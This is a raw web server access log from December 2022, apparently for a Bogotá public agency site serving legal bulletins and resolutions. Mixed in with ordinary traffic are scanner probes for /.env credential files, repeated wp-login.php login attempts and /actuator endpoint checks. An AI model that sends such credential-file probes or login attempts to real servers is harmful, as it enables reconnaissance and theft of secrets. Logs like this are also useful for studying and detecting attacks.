172.22.2.4 - - [18/Dec/2022:15:12:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:15:14:18 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1014&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 1072
172.22.2.4 - - [18/Dec/2022:15:14:18 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [18/Dec/2022:15:13:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
201.245.192.253 - - [18/Dec/2022:15:16:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:15:16:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:15:18:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.84.20.209 - - [18/Dec/2022:15:20:14 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 167184
95.217.144.245 - - [18/Dec/2022:15:20:32 -0500] "-" 408 -
95.217.144.245 - - [18/Dec/2022:15:20:34 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:15:18:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
201.245.192.253 - - [18/Dec/2022:15:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43937
201.245.192.253 - - [18/Dec/2022:15:20:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44077
95.217.144.240 - - [18/Dec/2022:15:21:08 -0500] "-" 408 -
207.46.13.194 - - [18/Dec/2022:15:21:11 -0500] "GET /Publicaciones/2022EE127895.pdf HTTP/1.1" 404 228
201.245.192.253 - - [18/Dec/2022:15:21:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
95.217.144.250 - - [18/Dec/2022:15:21:35 -0500] "-" 408 -
216.245.221.92 - - [18/Dec/2022:15:21:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:15:23:30 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1013&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 1092
168.119.253.69 - - [18/Dec/2022:15:25:28 -0500] "GET / HTTP/1.1" 200 319
168.119.252.253 - - [18/Dec/2022:15:25:37 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [18/Dec/2022:15:23:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:15:26:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:15:24:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
216.245.221.92 - - [18/Dec/2022:15:26:39 -0500] "HEAD / HTTP/1.1" 200 -
197.145.152.82 - - [18/Dec/2022:15:28:21 -0500] "GET /.env HTTP/1.1" 404 1018
197.145.152.82 - - [18/Dec/2022:15:28:21 -0500] "POST / HTTP/1.1" 200 319
185.33.168.169 - - [18/Dec/2022:15:29:52 -0500] "GET / HTTP/1.1" 200 319
185.33.168.169 - - [18/Dec/2022:15:29:52 -0500] "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1" 404 1152
185.119.81.106 - - [18/Dec/2022:15:30:09 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [18/Dec/2022:15:30:10 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
201.245.192.253 - - [18/Dec/2022:15:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43937
201.245.192.253 - - [18/Dec/2022:15:30:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44077
201.245.192.253 - - [18/Dec/2022:15:31:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:15:29:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Dec/2022:15:31:39 -0500] "HEAD / HTTP/1.1" 200 -
192.99.44.57 - - [18/Dec/2022:15:32:12 -0500] "GET /todo-un-exito-la-primera-jornada-de-adopcion-en-la-santamaria-15-perros-y-gatos-encontraron-un-nuevo-hogar-en-bogota.html HTTP/1.1" 200 994
172.22.2.4 - - [18/Dec/2022:15:30:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
172.22.2.4 - - [18/Dec/2022:15:32:44 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 200 22637
172.22.2.4 - - [18/Dec/2022:15:33:33 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1140
114.119.154.189 - - [18/Dec/2022:15:34:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2134.pdf HTTP/1.1" 200 283825
172.22.2.4 - - [18/Dec/2022:15:34:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [18/Dec/2022:15:36:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:15:36:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:15:35:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:15:36:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
69.171.249.14 - - [18/Dec/2022:15:38:15 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [18/Dec/2022:15:38:24 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [18/Dec/2022:15:38:34 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
66.249.65.213 - - [18/Dec/2022:15:39:35 -0500] "-" 408 -
201.245.192.253 - - [18/Dec/2022:15:40:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43937
201.245.192.253 - - [18/Dec/2022:15:40:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44077
172.22.2.4 - - [18/Dec/2022:15:41:04 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1158&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [18/Dec/2022:15:41:13 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [18/Dec/2022:15:41:14 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
201.245.192.253 - - [18/Dec/2022:15:41:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:15:41:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1158&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Dec/2022:15:41:31 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2021&resuelve=2254 HTTP/1.1" 200 626
172.22.2.4 - - [18/Dec/2022:15:41:38 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2020&resuelve=2254 HTTP/1.1" 200 626
216.245.221.92 - - [18/Dec/2022:15:41:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:15:41:46 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2019&resuelve=2254 HTTP/1.1" 200 626
95.217.144.240 - - [18/Dec/2022:15:42:15 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:15:41:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
161.18.209.154 - - [18/Dec/2022:15:43:31 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
161.18.209.154 - - [18/Dec/2022:15:43:31 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
161.18.209.154 - - [18/Dec/2022:15:43:31 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [18/Dec/2022:15:42:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53739
185.119.81.104 - - [18/Dec/2022:15:44:25 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [18/Dec/2022:15:44:26 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
66.249.66.197 - - [18/Dec/2022:15:44:55 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:15:45:50 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2019&resuelve=Resoluci%F3n%202254%20de%202017 HTTP/1.1" 200 626
201.245.192.253 - - [18/Dec/2022:15:46:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:15:46:39 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.182 - - [18/Dec/2022:15:48:10 -0500] "-" 408 -
157.55.39.152 - - [18/Dec/2022:15:48:39 -0500] "GET /bla/resoluciones/resoluciones%202012/0613.pdf HTTP/1.1" 304 -
172.22.2.4 - - [18/Dec/2022:15:47:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.104 - - [18/Dec/2022:15:49:17 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [18/Dec/2022:15:49:18 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [18/Dec/2022:15:48:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
207.46.13.174 - - [18/Dec/2022:15:50:18 -0500] "GET /forest/ HTTP/1.1" 200 12041
157.55.39.152 - - [18/Dec/2022:15:50:48 -0500] "GET /galeria/galeria/fotos/Entrenube3G.jpg HTTP/1.1" 200 138221
201.245.192.253 - - [18/Dec/2022:15:51:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:15:51:39 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.85 - - [18/Dec/2022:15:53:34 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:15:53:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:15:55:03 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [18/Dec/2022:15:55:04 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [18/Dec/2022:15:55:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1744&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 626
190.24.97.109 - - [18/Dec/2022:15:55:32 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
172.22.2.4 - - [18/Dec/2022:15:53:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48283
190.24.97.109 - - [18/Dec/2022:15:55:41 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 355045
172.22.2.4 - - [18/Dec/2022:15:55:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
190.24.97.109 - - [18/Dec/2022:15:55:49 -0500] "GET /BLA/resoluciones/AUTOS%202019/1477.pdf HTTP/1.1" 200 264195
201.245.192.253 - - [18/Dec/2022:15:56:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:15:56:23 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1158&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 626
216.245.221.92 - - [18/Dec/2022:15:56:39 -0500] "HEAD / HTTP/1.1" 200 -
107.150.105.183 - - [18/Dec/2022:15:57:44 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
107.150.105.183 - - [18/Dec/2022:15:57:44 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
107.150.105.183 - - [18/Dec/2022:15:57:44 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
107.150.105.183 - - [18/Dec/2022:15:57:44 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
107.150.105.183 - - [18/Dec/2022:15:57:44 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
107.150.105.183 - - [18/Dec/2022:15:57:49 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
107.150.105.183 - - [18/Dec/2022:15:57:49 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
107.150.105.183 - - [18/Dec/2022:15:57:49 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
107.150.105.183 - - [18/Dec/2022:15:58:22 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
170.78.40.164 - - [18/Dec/2022:15:59:54 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
170.78.40.164 - - [18/Dec/2022:15:59:55 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
170.78.40.164 - - [18/Dec/2022:15:59:55 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
170.78.40.164 - - [18/Dec/2022:15:59:55 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
170.78.40.164 - - [18/Dec/2022:15:59:55 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
170.78.40.164 - - [18/Dec/2022:15:59:55 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
170.78.40.164 - - [18/Dec/2022:16:00:16 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
170.78.40.164 - - [18/Dec/2022:16:00:20 -0500] "POST /appsia/controlador HTTP/1.1" 200 7724
170.78.40.164 - - [18/Dec/2022:16:00:20 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
172.22.2.4 - - [18/Dec/2022:15:58:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:16:01:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:15:59:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
216.245.221.92 - - [18/Dec/2022:16:01:39 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.88 - - [18/Dec/2022:16:02:04 -0500] "-" 408 -
162.55.167.166 - - [18/Dec/2022:16:02:20 -0500] "GET / HTTP/1.1" 200 319
173.252.111.1 - - [18/Dec/2022:16:03:14 -0500] "GET /images/Entrenubes%201%20(1)%20(1).jpeg HTTP/1.1" 200 70096
173.252.111.15 - - [18/Dec/2022:16:03:34 -0500] "GET /images/Musgo%20SDA%20(1)%20(1).png HTTP/1.1" 200 302122
95.217.144.240 - - [18/Dec/2022:16:04:58 -0500] "-" 408 -
95.217.144.245 - - [18/Dec/2022:16:05:10 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:16:05:30 -0500] "-" 408 -
201.245.192.253 - - [18/Dec/2022:16:06:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:16:04:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Dec/2022:16:06:39 -0500] "HEAD / HTTP/1.1" 200 -
15.235.118.56 - - [18/Dec/2022:16:06:44 -0500] "GET /.env HTTP/1.1" 404 1018
15.235.118.56 - - [18/Dec/2022:16:06:46 -0500] "GET /.env HTTP/1.1" 404 1018
95.217.144.250 - - [18/Dec/2022:16:07:13 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:16:05:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
192.241.198.196 - - [18/Dec/2022:16:08:23 -0500] "GET /portal/redlion HTTP/1.1" 404 1018
172.22.2.4 - - [18/Dec/2022:16:08:25 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=0731&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 1072
192.241.209.99 - - [18/Dec/2022:16:10:39 -0500] "GET /actuator/health HTTP/1.1" 404 1018
201.245.192.253 - - [18/Dec/2022:16:11:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:16:11:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:16:10:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:16:12:48 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2180&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 1049
172.22.2.4 - - [18/Dec/2022:16:11:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56474
172.22.2.4 - - [18/Dec/2022:16:14:24 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
173.252.111.17 - - [18/Dec/2022:16:14:29 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
66.249.65.213 - - [18/Dec/2022:16:16:11 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:16:16:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3047&usuario=&sector=&fecha=2016&resuelve= HTTP/1.1" 200 1060
201.245.192.253 - - [18/Dec/2022:16:16:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:16:16:39 -0500] "HEAD / HTTP/1.1" 200 -
186.155.14.240 - - [18/Dec/2022:16:17:36 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.155.14.240 - - [18/Dec/2022:16:17:36 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
186.155.14.240 - - [18/Dec/2022:16:17:36 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.155.14.240 - - [18/Dec/2022:16:17:36 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.155.14.240 - - [18/Dec/2022:16:17:36 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.155.14.240 - - [18/Dec/2022:16:17:40 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [18/Dec/2022:16:17:43 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [18/Dec/2022:16:17:43 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [18/Dec/2022:16:17:43 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [18/Dec/2022:16:17:43 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [18/Dec/2022:16:17:43 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [18/Dec/2022:16:17:43 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [18/Dec/2022:16:17:43 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
186.155.14.240 - - [18/Dec/2022:16:17:44 -0500] "POST /appsia/controlador HTTP/1.1" 200 14020
186.155.14.240 - - [18/Dec/2022:16:17:44 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [18/Dec/2022:16:17:47 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [18/Dec/2022:16:18:02 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0193&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 1376
172.22.2.4 - - [18/Dec/2022:16:18:03 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [18/Dec/2022:16:16:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
